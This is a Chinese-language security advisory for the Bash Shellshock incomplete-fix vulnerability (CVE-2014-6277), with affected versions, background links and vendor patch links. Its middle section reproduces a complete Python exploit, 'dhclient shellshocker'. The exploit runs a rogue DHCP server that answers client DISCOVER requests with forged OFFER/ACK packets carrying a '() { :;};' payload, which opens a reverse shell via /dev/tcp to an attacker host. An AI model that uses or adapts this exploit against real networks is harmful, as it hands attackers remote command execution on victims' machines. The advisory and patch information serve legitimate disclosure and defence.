GNU Bash不完整修复远程代码执行漏洞（CVE-2014-6277）

发布日期：2014-09-27
更新日期：2014-10-08受影响系统：
GNU Bash <= 4.3 bash43-026
描述：
BUGTRAQ ID: 70165
CVE（CAN） ID: CVE-2014-6277 Bash，Unix shell的一种，在1987年由布莱恩·福克斯为了GNU计划而编写。GNU Bash 4.3 bash43-026及之前版本没有正确解析环境变量值中的函数定义，这可使远程攻击者通过构造的环境，利用此漏洞执行任意代码或者造成拒绝服务。此漏洞源于CVE-2014-6271及CVE-2014-7169的不完整修复。Gitlab-shell 受 Bash CVE-2014-6271 漏洞影响 http://www.linuxidc.com/Linux/2014-09/107181.htmLinux再曝安全漏洞Bash 比心脏出血还严重 http://www.linuxidc.com/Linux/2014-09/107176.htm解决办法是升级 Bash，请参考这篇文章。http://www.linuxidc.com/Linux/2014-09/107182.htmLinux Bash安全漏洞修复 http://www.linuxidc.com/Linux/2014-10/107609.htm<*来源：Michal Zalewski （lcamtuf@echelon.pl）

链接：http://secunia.com/advisories/61549/
*>测试方法：警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
#！/usr/bin/python
# Exploit Title: dhclient shellshocker
# Google Dork: n/a
# Date: 10/1/14
# Exploit Author: @0x00string
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
# Version: 4.3.11
# Tested on: Ubuntu 14.04.1
# CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187
# ______ ______ ______ _
# / __ | / __ |/ __ | _ （_）
#| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___
#| |// | （ / ） |// | | |// | |/___） _） / ___） | _ / _ |/___）
#| /__| |） X （| /__| | /__| |___ | |__| | | | | | （（ | |___ |
# \_____/（_/ \_）\_____/ \_____/（___/ \___）_| |_|_| |_|\_|| （___/
# （_____|
# _ _ _ _
# | | | | （_） _
# _ | | | _ ____| |_ ____ ____ | |_
# / || | || / ___） | |/ _ ） _ | _）
#（（_| | | | （（___| | （（/ /| | | | |__
# \____|_| |_|\____）_|_|\____）_| |_|\___）
#
# _ _ _ _ _
# | | | | | | | | |
# ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____
# /___） || / _ ） | |/___） || / _ / ___） | / ） _ ）/ ___）
#|___ | | | （（/ /| | |___ | | | | |_| （（___| |< （（/ /| |
#（___/|_| |_|\____）_|_（___/|_| |_|\___/ \____）_| \_）____）_| # this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts
# once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out
# The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability.
# can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example. import socket, struct
def HexToByte（ hexStr ）:
b = []
h = "".join（ h.split（" "））
for i in range（0, len（h）, 2）:
b.append（ chr（ int （h[i:i+2], 16 ）））
return "".join（ b ） rport = 68
lport = 67 bsock = socket.socket（socket.AF_INET, socket.SOCK_DGRAM）
sock = socket.socket（socket.AF_INET, socket.SOCK_DGRAM） bsock.bind（（"<broadcast>", lport）） while True: OP = "72" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114
URL = "（） { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1".encode（"hex"）
URLLEN = chr（len（URL） / 2）.encode（"hex"）
END = "03040a000001ff"
broadcast_get, （bcrhost, rport） = bsock.recvfrom（2048）
hexip = broadcast_get[245:249]
rhost = str（ord（hexip[0]）） + "." + str（ord（hexip[1]）） + "." + str（ord（hexip[2]）） + "." + str（ord（hexip[3]））
XID = broadcast_get[4:8].encode（"hex"）
chaddr = broadcast_get[29:34].encode（"hex"）
print "[+] got broadcast with XID " + XID + " requesting IP " + rhost + " "
OFFER = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END
OFFER_BYTES = HexToByte（OFFER）
ACK = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END
ACK_BYTES = HexToByte（ACK）
print "[+] sending evil offer "
sock.sendto（OFFER_BYTES, （rhost, rport））
broadcast_get2 = bsock.recvfrom（2048）
print "[+] assuming request was received, sending ACK "
sock.sendto（ACK_BYTES, （rhost, rport））建议：
厂商补丁：GNU
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.gnu.org/software/bash
http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html
https://www.suse.com/support/shellshock/
http://support.novell.com/security/cve/CVE-2014-6277.html
https://kb.bluecoat.com/index？page=content&id=SA82 GNU Bash:
http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027
http://ftp.gnu.org/gnu/bash/bash-4.2-patches/bash42-050
http://ftp.gnu.org/gnu/bash/bash-4.1-patches/bash41-014
http://ftp.gnu.org/gnu/bash/bash-4.0-patches/bash40-041
http://ftp.gnu.org/gnu/bash/bash-3.2-patches/bash32-054
http://ftp.gnu.org/gnu/bash/bash-3.1-patches/bash31-020
http://ftp.gnu.org/gnu/bash/bash-3.0-patches/bash30-019
http://ftp.gnu.org/gnu/bash/bash-2.05b-patches/bash205b-010 Michal Zalewski:
http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html
http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html